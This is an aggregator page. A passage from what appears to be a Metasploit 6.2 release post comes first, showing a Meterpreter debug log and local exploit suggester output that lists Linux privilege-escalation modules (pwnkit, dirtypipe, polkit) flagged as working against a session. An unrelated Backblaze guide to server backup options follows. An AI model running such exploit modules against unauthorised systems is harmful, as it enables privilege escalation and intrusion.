DEBUG:root:[*] Encrypted AES key: 0x741a972aa2e95260279dc658f4b611ca2039a310ebb834dee47342a5809a68090fed0a87497f617c2b04ecf8aa1d6253cda0a513ccb53b4acc91e89b95b198dce98a0908a4edd668ff51f2fa80f4e2c6bc0b5592248a239f9a7b30b9e53a260b92a3fdf4a07fe4ae6538dfc9fa497d02010ee67bcf29b38ec5a81d62da119947a60c5b35e8b08291825024c734b98c249ad352b116618489246aebd0583831cc40e31e1d8f26c99eb57d637a1984db4dc186f8df752138f798fb2025555802bd6aa0cebe944c1b57b9e01d2d9d81f99a8195222ef2f32de8dfbc150286c122abdc78f19246e5ad65d765c23ba762fe95182587bd738d95814a023d31903c2a46
DEBUG:root:[*] TLV encryption sorted
DEBUG:root:[*] sending response packet
DEBUG:root:[*] running method core_set_session_guid
DEBUG:root:[*] sending response packet
DEBUG:root:[*] running method core_enumextcmd
DEBUG:root:[*] sending response packet
DEBUG:root:[*] running method core_enumextcmd
DEBUG:root:[*] sending response packet
... etc ...

For full details, see the Debugging Meterpreter Sessions documentation.

User-contributable docs

We have now released user-contributable documentation for Metasploit, available at https://docs.metasploit.com/. This new site provides a searchable source of information for multiple topics including:

Contributions are welcome, and the Markdown files can now be found within the Metasploit framework repo, under the docs folder.

Local exploit suggester improvements

The post/multi/recon/local_exploit_suggester post module can be used to iterate through multiple relevant Metasploit modules and automatically check for local vulnerabilities that may lead to privilege escalation.

Now with Metasploit 6.2, this module has been updated with a number of bug fixes, as well as improved UX that more clearly highlights which modules are viable:

msf6 post(multi/recon/local_exploit_suggester) > run session=-1
... etc ...
[*] ::1 - Valid modules for session 3:
============================
 #   Name                                                                Potentially Vulnerable?  Check Result
 -   ----                                                                -----------------------  ------------
 1   exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec                 Yes                      The target is vulnerable.
 2   exploit/linux/local/cve_2022_0847_dirtypipe                         Yes                      The target appears to be vulnerable. Linux kernel version found: 5.14.0
 3   exploit/linux/local/cve_2022_0995_watch_queue                       Yes                      The target appears to be vulnerable.
 4   exploit/linux/local/desktop_privilege_escalation                    Yes                      The target is vulnerable.
 5   exploit/linux/local/network_manager_vpnc_username_priv_esc          Yes                      The service is running, but could not be validated.
 6   exploit/linux/local/pkexec                                          Yes                      The service is running, but could not be validated.
 7   exploit/linux/local/polkit_dbus_auth_bypass                         Yes                      The service is running, but could not be validated. Detected polkit framework version 0.105.
 8   exploit/linux/local/su_login                                        Yes                      The target appears to be vulnerable.
 9   exploit/android/local/futex_requeue                                 No                       The check raised an exception.
 10  exploit/linux/local/abrt_raceabrt_priv_esc                          No                       The target is not exploitable.
 11  exploit/linux/local/abrt_sosreport_priv_esc                         No                       The target is not exploitable.
 12  exploit/linux/local/af_packet_chocobo_root_priv_esc                 No                       The target is not exploitable. Linux kernel 5.14.0-kali4-amd64 #1 is not vulnerable
 13  exploit/linux/local/af_packet_packet_set_ring_priv_esc              No                       The target is not exploitable.
 14  exploit/linux/local/apport_abrt_chroot_priv_esc                     No                       The target is not exploitable.
 15  exploit/linux/local/asan_suid_executable_priv_esc                   No                       The check raised an exception.
 16  exploit/linux/local/blueman_set_dhcp_handler_dbus_priv_esc          No                       The target is not exploitable.

Setting the option verbose=true will now also highlight modules that weren’t considered as part of the module suggestion phase due to session platform/arch/type mismatches. This is useful for evaluating modules that may require manually migrating from a shell session to Meterpreter, or from a Python Meterpreter to a native Meterpreter to gain local privilege escalation.

Upcoming roadmap work

In addition to the normal module development release cycle, the Metasploit team has now begun work on adding Kerberos authentication support as part of a planned Metasploit 6.3.0 release.

Get it

Existing Metasploit Framework users can update to the latest release of Metasploit Framework via the msfupdate command.

New users can either download the latest release through our nightly installers, or if you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest release.

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.

Server Backup 101: Choosing a Server Backup Solution

Post Syndicated from Kari Rivas original https://www.backblaze.com/blog/server-backup-101-choosing-a-server-backup-solution/

If you’re in charge of backups for your company, you know backing up your server is a critical task to protect important business data from data disasters like fires, floods, and ransomware attacks. You also likely know that digital transformation is pushing innovation forward with server backup solutions that live in the cloud.

Whether you operate in the cloud, on-premises, or with a hybrid environment, finding a server backup solution that meets your needs helps you keep your data and your business safe and secure.

This guide explains the various server backup solutions available both on-premises and in the cloud, and how to choose the right backup solution for you. Read on to learn more about choosing the right server backup solution for your needs.

On-premises Solutions for Server Backup

On-premises solutions store data on servers in an in-house data center managed and maintained internally. Although there has been a dramatic shift from on-premises to cloud server solutions, many organizations choose to operate their legacy systems on-premises alone or in conjunction with the cloud in a hybrid environment.

LTO/Tape

Linear tape-open (LTO) backup is the process of copying data from primary storage to a tape cartridge. If the hard disk crashes, the tapes will still hold a copy of the data.

Pros:

  • High capacity.
  • Tapes can last a long time.
  • Provides a physical air gap between backups and the network to protect against threats like ransomware.

Cons:

  • Up-front CapEx expense.
  • Tape drives must be monitored and maintained to ensure they are functioning properly.
  • Tapes take up lots of physical space.
  • Tape is susceptible to degradation over time.
  • The process of backing up to tape can be time consuming for high volumes of data.

NAS

Network-attached storage (NAS) enables multiple users and devices to store and back up data through a secure server. Anyone connected to a LAN can access the storage through a browser-based utility. It’s essentially an extra network strictly for storing data that users can access via its attached network device.

Pros:

  • Faster to restore files and access backups than tape backups.
  • More digitally intuitive and straightforward to navigate.
  • Comes with built-in backup and sync features.
  • Can connect and back up multiple computers and endpoints via the network.

Cons:

  • Requires physical maintenance and periodic drive replacement.
  • Each appliance has a limited storage capacity.
  • Because it’s connected to your network, it is also vulnerable to network attacks.

Local Server Backup

Putting your backup files on the same server or a storage server is not recommended for business applications. Still, many people choose to organize their backup storage on the same server the data runs on.

Pros:

  • Highly local.
  • Quick and easy to access.

Cons:

  • Generally less secure.
  • Capacity-limited.
  • Susceptible to malware, ransomware, and viruses.

Including these specific backup destinations, there are some pros to using on-premises backup solutions in general. For example, you might still be able to access backup files without an internet connection using on-premises solutions. And you can expect a fast restore if you have large amounts of data to recover.

However, all on-premises backup storage solutions are vulnerable to natural disasters, fires, and water damage despite your best efforts. While some methods like tape are naturally air-gapped, solutions like NAS are not. Even with a layered approach to data protection, NAS leaves a business susceptible to attacks.

Backing Up to Cloud Storage

Many organizations choose a cloud-based server for backup storage instead of or in addition to an on-premises solution (more on using both on-premises and cloud solutions together later) as they continue to integrate modern digital tools. While an on-premises system refers to data hardware and physical storage solutions, cloud storage lives “in the cloud.”

A cloud server is a virtual server that is hosted in a cloud provider’s data center. “The cloud” refers to the virtual servers users access through web browsers, APIs, CLIs, and SaaS applications and the databases that run on the servers themselves.

Because cloud providers manage the server’s physical location and hardware, organizations aren’t responsible for managing costly data centers. Even small businesses that can’t afford internal infrastructure can outsource data management, backup, and cloud storage from providers.

Pros

  • Highly scalable since companies can add as much storage as needed without ever running out of space.
  • Typically far less expensive than on-premises backup solutions because there’s no need to pay for dedicated IT staff, hardware upgrades or repair, or the space and electricity needed to run an on-premises system.
  • Builds resilience from natural disasters with off-site storage.
  • Virtual air-gapped protection may be available.
  • Fast recovery times in most cases.

Cons

  • Cloud storage fees can add up depending on the amount of storage your organization requires and the company you choose. Things like egress fees, minimum retention policies, and complicated pricing tiers can cause headaches later, so much so that there are companies dedicated to helping you decipher your AWS bill, for example.
  • Can require high bandwidth for initial deployment, however solutions like Universal Data Migration are making deployment and migrations easier.
  • Since backups can be accessed via API, they can be vulnerable to attacks without a feature like Object Lock.

It can be tough to choose between cloud storage vs. on-premises storage for backing up critical data. Many companies choose a hybrid cloud backup solution that involves both on-premises and cloud storage backup processes. Cloud backup providers often work with companies that want to build a hybrid cloud environment to run business applications and store data backups in case of a cyber attack, natural disaster, or hardware failure.

If you’re stuck between choosing an on-premises or cloud storage backup solution, a hybrid cloud option might be a good fit.

A hybrid cloud strategy combines a private, typically on-premises, cloud with a public cloud.

All-in-one vs. Integrated Solutions

When it comes to cloud backup solutions, there are two main types: all-in-one and integrated solutions.

Let’s talk about the differences between the two:

All-in-one Tools

All-in-one tools are cloud backup solutions that include both the backup application software and the cloud storage where backups will be stored. Instead of purchasing multiple products and deploying them separately, all-in-one tools allow users to deploy cloud storage with backup features together.

Pros:

  • No need for additional software.
  • Simple, out-of-the-box deployment.
  • Creates a seamless native environment.

Cons:

  • Some all-in-one tools sacrifice granularity for convenience, meaning they may not fit every use case.
  • They can be more costly than pairing cloud storage with backup software.

Integrated Solutions

Integrated solutions are pure cloud storage providers that offer cloud storage infrastructure without built-in backup software. An integrated solution means that organizations have to bring their own backup application that integrates with their chosen cloud provider.

Pros:

  • Mix and match your cloud storage and backup vendors to create a tailored server backup solution.
  • More control over your environment.
  • More control over your spending.

Cons:

  • Requires identifying and contracting with more than one provider.
  • Can require more technical expertise than with an all-in-one solution, but many cloud storage providers and backup software providers have existing integrations to make onboarding seamless.

How to Choose a Cloud Storage Solution

Choosing the best cloud storage solution for your organization involves careful consideration. There are several types of solutions available, each with unique capabilities. You don’t need the most expensive solution with bells and whistles. All you need to do is find the solution that fits your business model and future goals.

However, there are five main features that every organization seeking object storage in the cloud should look out for:

Cost

Cost is always a top concern for adopting new processes and tools in any business setting. Before choosing a cloud storage solution, take note of any fees or file size requirements for retention, egress, and data retrieval. Costs can vary significantly between storage providers, so be sure to check pricing details.

Ease-of-use and Onboarding Support

Adopting a new digital tool may also require a bit of a learning curve. Choosing a solution that supports your OS and is easy to use can help speed up the adoption rate. Check to see if there are data transfer options or services that can help you migrate more effectively. Not only should cloud storage be simple to use, but easy to deploy as well.

Security and Recovery Capabilities

Most object storage cloud solutions come with security and recovery capabilities. For example, you may be looking for a provider with Object Lock capabilities to protect data from ransomware or a simple way to implement disaster recovery protocols with a single command. Otherwise, you should check if the security specs meet your needs.

Integrations

All organizations seeking cloud storage solutions need to make sure that they choose a compatible solution with their existing systems and software. For example, if your applications speak the S3 API language, your storage systems must also speak the same language.

Many organizations use software-based backup tools to get things done. To take advantage of the benefits of cloud storage, these digital tools should also integrate with your storage solution. Popular backup solutions such as MSP360 and Veeam are built with native integrations for ease of use.

Support Models

The level of support you want and need should factor into your decision-making when choosing a cloud provider. If you know your team needs fast access to support personnel, make sure the cloud provider you choose offers a support SLA or the opportunity to purchase elevated levels of support.

Questions to Ask Before Deciding on a Cloud Storage Solution

Of course, there are other considerations to take into account. For example, managed service providers will likely need a cloud storage solution to manage multiple servers. Small business owners may only need a set amount of storage for now but with the ability to easily scale with pay-as-you-go pricing as the business grows. IT professionals might be looking for a simplified interface and centralized management to make monitoring and reporting more efficient.

When comparing different cloud solutions for object storage, there are a few more questions to ask before making a purchase:

  • Is there a web-based admin console? A web-based admin console makes it easy to view backups from multiple servers. You can manage all your storage from one single location and download or recover files from anywhere in the world with a network connection.
  • Are there multiple ways to interact with the storage? Does the provider offer different ways to access your data, for example, via a web console, APIs, CLI, etc.? If your infrastructure is configured to work with the S3 API, does the provider offer S3 compatibility?
  • Can you set retention? Some industries are more highly regulated than others. Consider whether your company needs a certain retention policy and ensure that your cloud storage provider doesn’t unnecessarily charge minimum file retention fees.
  • Is there native application support? A native environment can be helpful to back up an Exchange and SQL Server appropriately, especially for team members who are less experienced in cloud storage.
  • What types of restores does it offer? Another crucial factor to consider is how you can recover your data from cloud storage, if necessary.

Making a Buying Decision: The Intangibles

Lastly, don’t just consider the individual software and cloud storage solutions you’re buying. You should also consider the company you’re buying from. It’s worth doing your due diligence when vetting a cloud storage provider. Here are some areas to consider:

Stability

When it comes to crucial business data, you need to choose a company with a long-standing reputation for stability.

Data loss can happen if a not-so-well-known cloud provider suddenly goes down for good. And some lesser-known providers may not offer the same quality of uptime, storage, and other security and customer support options.

Find out how long the company has been providing cloud storage services, and do a little research to find out how popular its cloud services are.

Customers

Next, take a look at the organizations that use their cloud storage backup solutions. Do they work with companies similar to yours? Are there industry-specific features that can boost your business?

Choosing a cloud storage company that can provide the specs that your business requires plays an important role in the overall success of your organization. By looking at the other customers that a cloud storage company works with, you can better understand whether or not the solution will meet your needs.

Reviews

Online reviews are a great way to see how users respond to a cloud storage product’s features and benefits before trying it out yourself.

Many software review websites such as G2, Gartner Peer Insights, and Capterra offer a comprehensive overview of different cloud storage products and reviews from real customers. You can also take a look at the company’s website for case studies with companies like yours.

Values

Another area to investigate when choosing a cloud storage provider is the company values.

Organizations typically work with other companies that mirror their values and enhance their ability to put them into action. Choosing a cloud storage provider with the correct values can help you reach new clients. But choosing a provider with values that don’t align with your organization can turn customers away.

Many tech companies are proud of their values, so it’s easy to get a feel for what they stand for by checking out their social media feeds, about pages, and reviews from people who work there.

Continuous Improvement

An organization’s ability to improve over time shows resiliency, an eye for innovation, and the ability to deliver high-quality products to users like you. You can find out if a cloud storage provider has a good track record for improving and innovating their products by performing a search query for new products and features, new offerings, additional options, and industry recognition.

Keep each of the above factors in mind when choosing a server backup solution for your needs.

How Cloud Storage Can Protect Servers and Critical Business Data

Businesses have already made huge progress in moving to the cloud to enable digital transformations. Cloud-based solutions can help businesses modernize server backup solutions or adopt hybrid cloud strategies. To summarize, here are a few things to remember when considering a cloud storage solution for your server backup needs:

  • Understand the pros and cons of on-premises backup solutions and consider a hybrid cloud approach to storing backups.
  • Evaluate a provider’s cost, security offerings, integrations, and support structure.
  • Consider intangible factors like reputation, reviews, and values.

Have more questions about cloud storage or how to implement cloud backups for your server? Let us know in the comments. Ready to get started? Your first 10GB are free.

The post Server Backup 101: Choosing a Server Backup Solution appeared first on Backblaze Blog | Cloud Storage & Cloud Backup.

The collective thoughts of the interwebz

By continuing to use the site, you agree to the use of cookies. more information

The cookie settings on this website are set to "allow cookies" to give you the best browsing experience possible. If you continue to use this website without changing your cookie settings or you click "Accept" below then you are consenting to this.

Close